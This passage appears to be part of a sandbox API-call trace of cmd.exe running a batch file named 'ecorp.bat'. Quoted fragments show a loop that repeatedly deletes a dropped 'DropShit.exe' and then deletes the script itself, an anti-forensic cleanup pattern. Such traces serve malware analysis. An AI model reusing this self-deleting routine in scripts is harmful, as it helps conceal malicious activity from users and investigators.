Size=0x16) returned 0x27a2f0 [0092.121] GetProcessHeap () returned 0x250000 [0092.121] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x28) returned 0x2645e0 [0092.121] GetProcessHeap () returned 0x250000 [0092.121] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x2645e0, Size=0x1e) returned 0x264610 [0092.121] GetProcessHeap () returned 0x250000 [0092.121] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x264610) returned 0x1e [0092.121] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0092.122] GetProcessHeap () returned 0x250000 [0092.122] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cff0 [0092.122] GetProcessHeap () returned 0x250000 [0092.122] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1c) returned 0x2645e0 [0092.122] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0092.122] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0092.122] GetProcessHeap () returned 0x250000 [0092.122] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2e) returned 0x266a60 [0092.122] GetProcessHeap () returned 0x250000 [0092.122] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4c) returned 0x268a10 [0092.122] GetProcessHeap () returned 0x250000 [0092.122] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a10, Size=0x30) returned 0x268a10 [0092.122] GetProcessHeap () returned 0x250000 [0092.122] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a10) returned 0x30 [0092.122] GetProcessHeap () returned 0x250000 [0092.122] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26d0b0 [0092.122] GetProcessHeap () returned 0x250000 [0092.122] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x1a) returned 0x278f90 [0092.122] GetProcessHeap () returned 0x250000 [0092.122] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x20) returned 0x278fc0 [0092.122] _tell (_FileHandle=3) returned 66 [0092.122] _close (_FileHandle=3) returned 0 [0092.122] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.122] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.122] GetFileType (hFile=0x7) returned 0x2 [0092.122] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.123] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.123] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.123] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.123] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.123] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.123] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.123] GetFileType (hFile=0x7) returned 0x2 [0092.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.124] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.124] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer="if ") returned 3 [0092.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.124] GetFileType (hFile=0x7) returned 0x2 [0092.124] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.124] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.124] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.124] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x3) returned 1 [0092.125] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x14efa8 | out: _Buffer="exist \"DropShit.exe\" ") returned 21 [0092.125] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.125] GetFileType (hFile=0x7) returned 0x2 [0092.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.125] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.125] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.125] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x15, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x15) returned 1 [0092.125] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.125] GetFileType (hFile=0x7) returned 0x2 [0092.125] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.125] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.126] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.126] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x278fa0*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x278fa0*, lpNumberOfCharsWritten=0x14efa8*=0x4) returned 1 [0092.126] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efa8 | out: _Buffer=" Repeat ") returned 8 [0092.126] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.126] GetFileType (hFile=0x7) returned 0x2 [0092.126] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.126] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef38 | out: lpMode=0x14ef38) returned 1 [0092.126] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.126] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x14ef78, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ef78*=0x8) returned 1 [0092.127] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.127] GetFileType (hFile=0x7) returned 0x2 [0092.127] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.127] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.127] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.127] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.127] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x208, lpBuffer=0x14eae0, lpFilePart=0x14e880 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14e880*="DropShit.exe") returned 0x32 [0092.127] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0092.127] FindFirstFileExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", fInfoLevelId=0x1, lpFindFileData=0x14e890, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x14e890) returned 0x268a50 [0092.128] FindClose (in: hFindFile=0x268a50 | out: hFindFile=0x268a50) returned 1 [0092.128] GetConsoleTitleW (in: lpConsoleTitle=0x14ec40, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.128] GetProcessHeap () returned 0x250000 [0092.128] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266aa0 [0092.128] GetProcessHeap () returned 0x250000 [0092.128] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x266aa0, Size=0x20) returned 0x278ff0 [0092.128] GetProcessHeap () returned 0x250000 [0092.128] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x278ff0) returned 0x20 [0092.128] GetProcessHeap () returned 0x250000 [0092.128] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266aa0 [0092.128] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14e6f8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.128] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.128] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.128] SetFilePointer (in: hFile=0x5c, lDistanceToMove=66, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.128] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.128] GetFileSize (in: hFile=0x5c, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x51 [0092.128] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.128] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.128] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.128] GetFileType (hFile=0x5c) returned 0x1 [0092.128] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x42 [0092.128] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0xf, lpOverlapped=0x0) returned 1 [0092.128] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=15, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr="del ecorp.bat\r\n") returned 15 [0092.129] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.129] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0092.129] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.129] GetFileType (hFile=0x5c) returned 0x1 [0092.129] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x51 [0092.129] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x0, lpOverlapped=0x0) returned 1 [0092.129] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.129] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.129] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.129] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.129] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.129] GetFileType (hFile=0x5c) returned 0x1 [0092.129] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0092.129] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x14e7b0, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14e7b0*=0x51, lpOverlapped=0x0) returned 1 [0092.129] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.129] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=9, lpWideCharStr=0x4a9b7b60, cchWideChar=512 | out: lpWideCharStr=":Repeat\r\n.bat\r\n") returned 9 [0092.129] _close (_FileHandle=3) returned 0 [0092.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.129] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0092.129] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.129] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9ae194 | out: lpMode=0x4a9ae194) returned 1 [0092.130] _get_osfhandle (_FileHandle=0) returned 0x3 [0092.130] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9ae198 | out: lpMode=0x4a9ae198) returned 1 [0092.130] SetConsoleInputExeNameW () returned 0x1 [0092.130] GetConsoleOutputCP () returned 0x1b5 [0092.130] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9bbfe0 | out: lpCPInfo=0x4a9bbfe0) returned 1 [0092.130] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0092.130] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\ecorp.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ecorp.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x14ef58, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5c [0092.130] _open_osfhandle (_OSFileHandle=0x5c, _Flags=8) returned 3 [0092.130] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.130] SetFilePointer (in: hFile=0x5c, lDistanceToMove=9, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.130] GetProcessHeap () returned 0x250000 [0092.130] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266aa0 | out: hHeap=0x250000) returned 1 [0092.130] GetProcessHeap () returned 0x250000 [0092.130] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278ff0 | out: hHeap=0x250000) returned 1 [0092.130] GetProcessHeap () returned 0x250000 [0092.130] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278fc0 | out: hHeap=0x250000) returned 1 [0092.130] GetProcessHeap () returned 0x250000 [0092.130] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x278f90 | out: hHeap=0x250000) returned 1 [0092.130] GetProcessHeap () returned 0x250000 [0092.130] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26d0b0 | out: hHeap=0x250000) returned 1 [0092.130] GetProcessHeap () returned 0x250000 [0092.131] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x268a10 | out: hHeap=0x250000) returned 1 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x266a60 | out: hHeap=0x250000) returned 1 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x2645e0 | out: hHeap=0x250000) returned 1 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cff0 | out: hHeap=0x250000) returned 1 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x264610 | out: hHeap=0x250000) returned 1 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27a2f0 | out: hHeap=0x250000) returned 1 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x26cf30 | out: hHeap=0x250000) returned 1 [0092.131] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.131] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9 [0092.131] ReadFile (in: hFile=0x5c, lpBuffer=0x4a9bc320, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x14ed60, lpOverlapped=0x0 | out: lpBuffer=0x4a9bc320*, lpNumberOfBytesRead=0x14ed60*=0x48, lpOverlapped=0x0) returned 1 [0092.131] SetFilePointer (in: hFile=0x5c, lDistanceToMove=29, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.131] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x4a9bc320, cbMultiByte=20, lpWideCharStr=0x4a9be320, cchWideChar=8191 | out: lpWideCharStr="del \"DropShit.exe\"\r\nxe\" goto Repeat\r\n") returned 20 [0092.131] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.131] GetFileType (hFile=0x5c) returned 0x1 [0092.131] _get_osfhandle (_FileHandle=3) returned 0x5c [0092.131] SetFilePointer (in: hFile=0x5c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x1d [0092.131] GetProcessHeap () returned 0x250000 [0092.131] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x4012) returned 0x27c760 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] HeapFree (in: hHeap=0x250000, dwFlags=0x0, lpMem=0x27c760 | out: hHeap=0x250000) returned 1 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0xb0) returned 0x26cf30 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x18) returned 0x27a2f0 [0092.131] GetProcessHeap () returned 0x250000 [0092.131] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x30) returned 0x266a60 [0092.131] _tell (_FileHandle=3) returned 29 [0092.132] _close (_FileHandle=3) returned 0 [0092.132] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14ecf8 | out: _Buffer="\r\n") returned 2 [0092.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.132] GetFileType (hFile=0x7) returned 0x2 [0092.132] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.132] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ec88 | out: lpMode=0x14ec88) returned 1 [0092.132] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.132] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14ecc8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14ecc8*=0x2) returned 1 [0092.133] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9bc0a0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.133] _vsnwprintf (in: _Buffer=0x4a9aeb60, _BufferCount=0x3fe, _Format="%s", _ArgList=0x14ed08 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0092.133] _vsnwprintf (in: _Buffer=0x4a9aebaa, _BufferCount=0x3d9, _Format="%c", _ArgList=0x14ed08 | out: _Buffer=">") returned 1 [0092.133] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.133] GetFileType (hFile=0x7) returned 0x2 [0092.133] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.133] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ecb8 | out: lpMode=0x14ecb8) returned 1 [0092.133] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.133] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9aeb60*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x14ecf8, lpReserved=0x0 | out: lpBuffer=0x4a9aeb60*, lpNumberOfCharsWritten=0x14ecf8*=0x26) returned 1 [0092.133] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.133] GetFileType (hFile=0x7) returned 0x2 [0092.134] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.134] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef98 | out: lpMode=0x14ef98) returned 1 [0092.134] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.134] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x27a300*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x14efd8, lpReserved=0x0 | out: lpBuffer=0x27a300*, lpNumberOfCharsWritten=0x14efd8*=0x3) returned 1 [0092.134] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x14efd8 | out: _Buffer=" \"DropShit.exe\" ") returned 16 [0092.134] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.134] GetFileType (hFile=0x7) returned 0x2 [0092.134] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.134] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.134] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.134] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x10, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x10) returned 1 [0092.135] _vsnwprintf (in: _Buffer=0x4a9c6340, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x14efd8 | out: _Buffer="\r\n") returned 2 [0092.135] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.135] GetFileType (hFile=0x7) returned 0x2 [0092.135] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0092.135] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x14ef68 | out: lpMode=0x14ef68) returned 1 [0092.176] _get_osfhandle (_FileHandle=1) returned 0x7 [0092.176] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4a9c6340*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x14efa8, lpReserved=0x0 | out: lpBuffer=0x4a9c6340*, lpNumberOfCharsWritten=0x14efa8*=0x2) returned 1 [0092.176] _wcsicmp (_String1="del", _String2="DIR") returned -4 [0092.176] _wcsicmp (_String1="del", _String2="ERASE") returned -1 [0092.176] _wcsicmp (_String1="del", _String2="DEL") returned 0 [0092.176] GetConsoleTitleW (in: lpConsoleTitle=0x14ed00, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0092.176] GetProcessHeap () returned 0x250000 [0092.177] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x268a10 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a10, Size=0x30) returned 0x268a10 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a10) returned 0x30 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x38) returned 0x266aa0 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x50) returned 0x268a50 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlReAllocateHeap (Heap=0x250000, Flags=0x0, Ptr=0x268a50, Size=0x30) returned 0x268a50 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlSizeHeap (HeapHandle=0x250000, Flags=0x0, MemoryPointer=0x268a50) returned 0x30 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266ae0 [0092.177] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14e860 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x268a90 [0092.177] GetCurrentDirectoryW (in: nBufferLength=0x106, lpBuffer=0x14d770 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.177] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x14e280, nFileSystemNameSize=0x106 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x0, lpMaximumComponentLength=0x14da28*=0xff, lpFileSystemFlags=0x0, lpFileSystemNameBuffer="NTFS") returned 1 [0092.177] _wcsicmp (_String1="NTFS", _String2="FAT") returned 8 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x58) returned 0x26ccf0 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x2518c0 [0092.177] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.177] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.177] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.177] GetProcessHeap () returned 0x250000 [0092.177] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x218) returned 0x251b30 [0092.177] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x251b40 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0092.177] SetErrorMode (uMode=0x0) returned 0x0 [0092.178] SetErrorMode (uMode=0x1) returned 0x0 [0092.178] GetFullPathNameW (in: lpFileName="DropShit.exe", nBufferLength=0x104, lpBuffer=0x14d790, lpFilePart=0x14d780 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\DropShit.exe", lpFilePart=0x14d780*="DropShit.exe") returned 0x32 [0092.178] SetErrorMode (uMode=0x0) returned 0x1 [0092.178] GetProcessHeap () returned 0x250000 [0092.178] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x260) returned 0x26ef00 [0092.178] _wcsicmp (_String1="DropShit.exe", _String2=".") returned 54 [0092.178] _wcsicmp (_String1="DropShit.exe", _String2="..") returned 54 [0092.178] GetFileAttributesW (lpFileName="DropShit.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\dropshit.exe")) returned 0x20 [0092.178] GetProcessHeap () returned 0x250000 [0092.178] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x2a) returned 0x266b20 [0092.178] GetProcessHeap () returned 0x250000 [0092.178] RtlAllocateHeap (HeapHandle=0x250000, Flags=0x8, Size=0x5c) returned 0x26cd50 [0092.178] GetProcessHeap () returned 0x250000 [0092.178] 